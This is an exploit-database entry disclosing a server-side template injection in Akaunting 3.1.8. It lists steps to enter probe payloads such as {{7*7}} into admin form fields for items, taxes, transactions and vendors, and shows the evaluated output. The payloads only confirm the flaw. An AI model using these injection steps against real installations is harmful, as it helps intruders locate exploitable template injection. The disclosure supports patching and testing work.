Share
## https://sploitus.com/exploit?id=PACKETSTORM:178866
# Exploit Title: Akaunting 3.1.8 - Server-Side Template Injection (SSTI)  
# Exploit Author: tmrswrr  
# Date: 30/05/2024  
# Vendor: https://akaunting.com/forum  
# Software Link: https://akaunting.com/apps/crm  
# Vulnerable Version(s): 3.1.8  
# Tested : https://www.softaculous.com/apps/erp/Akaunting  
  
  
1 ) Login with admin cred and go to : Items > New Item  
https://127.0.0.1/Akaunting/1/common/items  
2 ) Write SSTI payload : {{7*7}} Name field , write Sale and Purchase Price random numbers  
3 ) Save it   
4 ) You will be see result :   
49  
  
  
====================================================================================  
  
1 ) Login with admin cred and go to :Settings > Taxes > New Tax  
https://127.0.0.1/Akaunting/1/settings/taxes/1/edit  
2 ) Write SSTI payload : {{7*7}} Name field , write Sale and Purchase Price random numbers  
3 ) Save it   
4 ) You will be see result :   
49  
> {{'a'.toUpperCase()}}  
> A  
> {{'a'.concat('b')}}  
> ab  
====================================================================================  
  
  
1 ) Login with admin cred and go to : Banking > Transactions > New Income  
https://127.0.0.1/Akaunting/1/banking/transactions/create?type=income  
2 ) Write SSTI payload : {{7*7}} Description field  
3 ) Save it   
4 ) You will be see result :   
49  
> {{'a'.toUpperCase()}}  
> A  
> {{'a'.concat('b')}}  
> ab  
  
=======================================================================================  
  
1 ) Login with admin cred  
https://127.0.0.1/Akaunting/1/purchases/vendors/1/edit  
2 ) Write SSTI payload : {{7*7}} Name field  
3 ) Save it   
4 ) You will be see result :   
49  
> {{'a'.toUpperCase()}}  
> A  
> {{'a'.concat('b')}}  
> ab